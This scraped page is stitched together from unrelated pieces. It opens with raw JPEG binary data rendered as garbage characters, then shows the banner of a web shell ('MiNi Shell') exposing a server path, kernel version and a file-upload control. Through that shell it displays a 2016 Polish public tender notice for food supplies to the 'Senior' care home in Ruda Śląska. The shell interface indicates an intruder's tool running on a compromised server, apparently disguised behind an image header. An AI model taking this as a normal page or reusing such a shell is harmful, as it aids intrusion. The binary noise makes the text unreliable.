JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20160523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20160523/130018-N-2016.html

<p class="kh_header"><b>Ruda Śląska: Dostawy artykułów żywnościowych 
dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej</b><br>
<b>Numer ogłoszenia: 130018 - 2016; data zamieszczenia: 23.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Senior" w Rudzie Śląskiej , ul. Puszkina 7, 41-704 Ruda Śląska, woj. śląskie, tel. 032 2481774, faks 032 2481774 w. 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.dps-senior.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów żywnościowych 
dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie realizowane będzie z podziałem na wyszczególnione poniżej pakiety:

Pakiet nr 1	Dostawa przetworów spożywczych (CPV- 15 131000-5; 15 330000-0;15 410000-5)
Pakiet nr 2	Dostawa artykułów sypkich (CPV- 15 600000-4; 15 800000-6)
Pakiet nr 3	Dostawa artykułów nabiałowych (CPV- 15 500000-3; 15 400000-2; 15 898000-9)
Pakiet nr 4	Dostawa pieczywa (CPV- 15 810000-9)
Pakiet nr 5	Dostawa wypieków cukierniczych (CPV- 15 810000-9)
Pakiet nr 6	Dostawa warzyw świeżych i suszonych (CPV- 03 200000-3; 15 331135-2)
Pakiet nr 7	Dostawa owoców świeżych i suszonych(CPV- 03-200000-3; 15 662410-1)
Pakiet nr 8	Dostawa warzyw i owoców mrożonych (CPV- 15 330000-0) 
Pakiet nr 9	Dostawa ryb mrożonych, świeżych, wędzonych i przetworów rybnych 
(CPV-15 200000-0)
Pakiet nr 10 	Dostawa mięsa wieprzowego i wołowego oraz podrobów (CPV- 15 110000-2)
Pakiet nr 11 	Dostawa mięsa i podrobów drobiowych (CPV- 15 110000-2)
Pakiet nr 12 	Dostawa wędlin (CPV- 15 131100-6)
Pakiet nr 13 	Dostawa jaj kurzych (CPV- 03 142500-3)
Pakiet nr 14	Dostawa czekolad i wyrobów cukierniczych (CPV- 15 840000-8)
Pakiet nr 15 	Dostawa napojów bezalkoholowych (CPV- 15 980000-1).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.33.00.00-0, 15.41.00.00-5, 15.60.00.00-4, 15.80.00.00-6, 15.50.00.00-3, 15.40.00.00-2, 15.89.80.00-9, 15.81.00.00-9, 03.20.00.00-3, 15.33.11.35-2, 15.66.24.10-1, 15.33.00.00-0, 15.20.00.00-0, 15.11.00.00-2, 15.13.11.00-6, 03.14.25.00-3, 15.84.00.00-8, 15.98.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków, o których mowa w art.22 ust.1 ustawy Wykonawca przystępujący do niniejszego postępowania zobowiązany jest przedłożyć oświadczenie - zgodnie z Załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków, o których mowa w art.22 ust.1 ustawy Wykonawca przystępujący do niniejszego postępowania zobowiązany jest przedłożyć oświadczenie - zgodnie z Załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków, o których mowa w art.22 ust.1 ustawy Wykonawca przystępujący do niniejszego postępowania zobowiązany jest przedłożyć oświadczenie - zgodnie z Załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków, o których mowa w art.22 ust.1 ustawy Wykonawca przystępujący do niniejszego postępowania zobowiązany jest przedłożyć oświadczenie - zgodnie z Załącznikiem nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków, o których mowa w art.22 ust.1 ustawy Wykonawca przystępujący do niniejszego postępowania zobowiązany jest przedłożyć oświadczenie - zgodnie z Załącznikiem nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie, że Wykonawca zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń na formularzu ofertowym - zgodnie z Załącznikiem nr 1 do SIWZ.
Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. 
2.W przypadku podmiotów wspólnie ubiegających się o zamówienie, pełnomocnictwo takie może wynikać z dołączonej do oferty umowy regulującej współpracę tych podmiotów. Pełnomocnictwo należy dołączyć w oryginale bądź kopii potwierdzonej za zgodność z oryginałem notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dps-senior.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Senior w Rudzie Śląskiej
ul. Puszkina 7
41-704 Ruda Śląska,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 11:30, miejsce: Dom Pomocy Społecznej Senior w Rudzie Śląskiej
ul. Puszkina 7
41-704 Ruda Śląska, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA PRZETWORÓW SPOŻYWCZYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ananas kons. plastry - masa netto bez zalewy	300-1000g	kg	10,00				
2	Brzoskwinie konserwowe - masa netto bez zalewy	300-1000g	kg	10,00				
3	Chrzan tarty na kwasku cytrynowym	150-300g	kg	33,00				
4	Ćwikła z chrzanem	250-500g	kg	8,00				
5	Dżemy owocowe niskosłodzone z kawałkami owoców (różne smaki) 	250-350g	kg	70,00				
6	Fasola czerwona, biała konserwowa - masa netto bez zalewy	200-500g	kg	10,00				
7	Fasola szparagowa konserwowa - masa netto             bez zalewy	200-1000g	kg	30,00				
8	Groszek konserwowy - masa netto bez zalewy	200-500g	kg	60,00				
9	Ketchup łagodny minimum 55% przecieru pomidorowego	250-1000g	kg	95,00				
10	Koncentrat pomidorowy 30%	800-1000g	kg	75,00				
11	Koncentrat pomidorowy 30%	180-200g	kg	30,00				
12	Koncentrat buraczany płynny min.12% soku                    z buraków	180-500g	kg	7,00				
13	Krem czekoladowy do smarowania z dodatkiem orzechów	180-400g	kg	15,00				
14	Kukurydza konserwowa - masa netto bez zalewy	200-500g	kg	9,00				
15	Miód naturalny	200-500g	kg	20,00				
16	Musztarda delikatesowa	800-1000g	kg	80,00				
17	Musztarda delikatesowa	150-250g	kg	35,00				
18	Ocet 10%	0,5l	l	55,00				
19	Ogórki konserwowe całe - masa netto bez zalewy	900-1000g	kg	100,00				
20	Olej uniwersalny rzepakowy	0,9- 1l	l	370,00				
21	Olej słonecznikowy	0,5-1,0l	l	8,00				
22	Papryka konserwowa, słodka płaty - masa netto         bez zalewy	500-1000g	kg	5,00				
23	Powidła śliwkowe	280-500g	kg	45,00				
24	Przyprawa do zup w płynie	900-1000g	l	200,00				
25	Seler konserwowy, nitki - masa netto bez zalewy	280-500g	kg	7,00				
26	Sos słodko kwaśny, chiński, meksykański, itp.	300-600g	kg	15,00				
27	Zaprawa cytrynowa min. 40% soku z cytryny	0,5-1l	l	230,00				
28	Majonez dekoracyjny sałatkowy	180-400g	kg	40,00				
29	Majonez dekoracyjny sałatkowy	800-1000g	kg	75,00				
II	Konserwy mięsne
1	Mielonka konserwowa - turystyczna, tyrolska itp.	100-300g	kg	40,00				
2	Szynka konserwowa wieprzowa 	100-300g	kg	13,00				
3	Szynka konserwowa drobiowa 	100-300g	kg	15,00				
4	Pasztet drobiowy smakowy	100-200g	kg	8,00				
5	Pasztet drobiowy 	160g	kg	35,00				
6	Pasztet wieprzowy	100-300g	kg	85,00				
Razem			


III	Bakalie
1	Rodzynki	100-500g	kg	2,00				
2	Kokos - wiórki	100-500g	kg	0,50				
3	Orzechy włoskie łuskane	100-500g	kg	1,50				
4	Morele suszone	100-500g	kg	1,50				
5	Migdały - płatki	50-200g	kg	1,20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.33.00.00-0, 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW SYPKICH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Budyń - różne smaki bez dodatku cukru 1000g	kg	25
2	Budyń - różne smaki bez dodatku cukru	35-60g	kg	7
3	Bulion grzybowy, sypki	500-1000g	kg	2,5
4	Cukier kryształ	1000g	kg	1650
5	Cukier wanilinowy	10-50g	kg	1
6	Cynamon mielony	10-20g	kg	0,4
7	Czosnek granulowany, polski	10-20g	kg	9
8	Galaretka owocowa, różne smaki	75-100g	kg	22
9	Gałka muszkatołowa, mielona	10-20g	kg	0,20
10	Herbata expresowa owocowa, różne smaki, a  20 szt	30-40g	kg	1
11	Herbata expresowa czarna a100 szt.	100-150g	kg	65
12	Herbata expresowa ziołowa  a 20 szt  mięta, melisa, rumianek  30-40g	kg	0,5
13	Imbir mielony	10 - 20g	kg	0,1
14	Kakao naturalne ciemne  tłuszcz kakaowy min. 12% 100-200g	kg	5
15	Kasza gryczana, cała	500-1000g	kg	35
16	Kasza jęczmienna , średnia	500-1000g	kg	70
17	Kasza manna	500-1000g	kg	70
18	Kaszka mleczno - ryżowa  smakowa 	230g	kg	12
19	Kawa naturalna mielona 100%	100g	kg	18
20	Kawa naturalna mielona 100%	250-500g	kg	35
21	Kawa zbożowa	200-500g	kg	30
22	Kleik ryżowy	160-200g	kg	7
23	Kminek	10-20g	kg	0,3
24	Kwasek cytrynowy	10-20g	kg	0,70
25	Liść laurowy	5-20g	kg	0,40
26	Majeranek	5-20g	kg	1,10
27	Makaron 4 jajeczny - łazanki  250-1000g	kg	30,00
28	Makaron 4 jajeczny - nitki 	250-1000g	kg	80,00
29	Makaron 4 jajeczny - kolanka, rurki, muszelki, świderki 250-1000g	kg	130,00
30	Mąka pszenna poznańska	1000g	kg	400,00
31	Mąka ziemniaczana	1000g	kg	250,00
32	Mąka żytnia żurek	1000g	kg	25,00
33	Papryka słodka mielona	10-20g	kg	3,00
34	Pieprz czarny mielony	10-20g	kg	4,00
35	Płatki kukurydziane smakowe	500-1000g	kg	14,00
36	Płatki owsiane	500g	kg	35,00
37	Płatki ryżowe	200-500g	kg	25,00
38	Przyprawa warzywna do potraw	75-200g	kg	20,00
39	Rosół drobiowy sypki  500-3000g	kg	36,00
40	Ryż biały	1000g	kg	140,00
41	Sos biały	25-50g	kg	2,50
42	Sos pieczeniowy ciemny	25-50g	kg	6,50
43	Sos sałatkowy - różne smaki	8-20g	kg	0,60
44	Sól spożywcza jodowana	1000g	kg	210,00
45	Sucharki	280-300g	kg	6,00
46	Ziele angielskie	10-20g	kg	0,50
47	Żelatyna spożywcza wieprzowa	50g	kg	6,50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW NABIAŁOWYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Deser wielosmakowy: ryżowy, z kaszą manną 	120-200g	kg	75,00
2	Deser wielosmakowy z bitą śmietaną na bazie budyniu,  twarożku 	120-200g	kg	170,00
3	 Jogurt owocowy 	115-200g	kg	320,00
4	Jogurt naturalny 	150-200g	kg	130,00
5	Jogurt pitny 	150-250g	kg	100,00
6	Maślanka naturalna karton	1l	l	370,00
7	Maślanka owocowa	250-300g	kg	140,00
8	Kefir naturalny	150-250g	kg	50,00
9	Margaryna do smarowania pieczywa,                              z dodatkiem masła	500g	kg	10,00
10	Margaryna mleczna zwykła 	250g	kg	160,00
11	Masło extra 82% 	200g	kg	950,00
12	Mix tłuszczowy do smarowania min.75%tłuszczu ( zawartość tłuszczu mlecznego min.12%)	200-250g	kg	100,00
13	Mleko 2%  	5-20l 	l	6500,00
14	Mleko 2%  	1l	l	300,00
15	Ser biały półtłusty - krajanka		kg	320,00
16	Ser podpuszczkowy pleśniowy 	100-200g	kg	12,00
17	Ser domowy z kminkiem	150-200g	kg	90,00
18	Ser wielosmakowy fromage	75-100g	kg	65,00
19	Ser żółty łagodny 45%	1000-3000g	kg	100,00
20	Ser żółty wędzony	1000-2000g	kg	12,00
21	Serek topiony kremowy kostka, 27% tłuszczu pochodzenia zwierzęcego - różne smaki	100g	kg	100,00
22	Serek topiony kremowy wędzony 	1000-2000g	kg	65,00
23	Serek homogenizowany - różne smaki	100-200g	kg	280,00
24	Serek naturalny homogenizowany	100-200g	kg	75,00
25	Serek kanapkowy twarożkowy, kremowy - różne smaki	100-150g	kg	90,00
26	Serek twarożkowy wiejski ziarnisty	200g	kg	160,00
27	Śmietanka do kawy 10%	10g	szt	1500,00
28	Śmietana spożywcza słodka 18% 	250-500ml	l	210,00
29	Śmietana 12%  homogenizowana 	180g-400g	kg	12,00
30	Śmietana 30% kremówka	200-500g	kg	12,00
31	Smalec wieprzowy kostka	200-250g	kg	22,00
32	Napój probiotyczny 	100g	kg	6,00
33	Mleczko smakowe	200 - 400g	kg	6,00
34	Drożdże piekarnicze świeże	42-100g	kg	2,50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.40.00.00-2, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA PIECZYWA
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb pszenno-żytni  krojony	900-1000g	kg	7100,00
2	Chleb wielosmakowy - krojony (słonecznikowy, sojowy, graham, karmelowy, cebulowy, razowy itp.)	400 - 500g	kg	710,00
3	Wek krojony	300-500g	kg	115,00
4	Bułka kajzerka	50g	kg	850,00
5	Pieczywo mleczne (rogal, chałka )	50-100g	kg	60,00
6	Bułka mleczna  	50-80g	kg	85,00
7	Groszek ptysiowy	 	kg	2,50
8	Bułka tarta	400-500g	kg	130,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> DOSTAWA WYPIEKÓW CUKIERNICZYCH
        DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rogalik z różnymi nadzieniami	70-100g	kg	100,00
2	Rogalik z różnymi nadzieniami z ogr. ilością cukru	70-100g	kg	30,00
3	Drożdżówka wielosmakowa (ser-mak,                      ser-marmolada itd. )	80-120g	kg	80,00
4	Drożdżówka z ograniczoną ilością cukru	80-120g	kg	25,00
5	Jagodzianka	70 -100g	kg	60,00
6	Jagodzianka z ogr.ilością cukru	70-100g	kg	20,00
7	Pączek z różnym nadzieniem (śmietana, marmolada, budyń, adwokat itd.)	80 - 100g	kg	100,00
8	Pączek z ograniczoną ilością cukru, bez polewy	80 - 100g	kg	30,00
9	Ciasto tortowe z kremem (na bazie budyniu),                    z owocami i galaretką owocową	 	kg	100,00
10	Ciastka w-z	80-100g	kg	25,00
11	Sernik na drożdżowym spodzie	 	kg	70,00
12	Ciasto drożdżowe z posypką	 	kg	20,00
13	Ciasto z owocami na drożdżowym spodzie	 	kg	80,00
14	Ciasto z owocami na piaskowym spodzie		kg	90,00
15	Szarlotka	 	kg	85,00
16	Sernik na cieście ucieranym	 	kg	80,00
17	Rolada z bitą śmietaną	 	kg	30,00
18	Ptysie miniaturki nadziewane śmietaną, budyniem itp.	 	kg	10,00
19	Kokosanki	 	kg	40,00
20	Piernik do moczki	 	kg	3,50
21	Piernik z bakaliami w czekoladzie	 	kg	20,00
22	Pączki mini  	kg	5,00
23	Babeczki piaskowe	70-100g	kg	100,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DOSTAWA WARZYW ŚWIEŻYCH I SUSZONYCH
DLA DOMU POMOCY SPOŁECZNEJ SENIOR W RUDZIE ŚLĄSKIEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Buraki		kg	450,00
2	Botwinka		kg	15,00
3	Brokuły - różyczka		kg	5,00
4	Cebula		kg	280,00
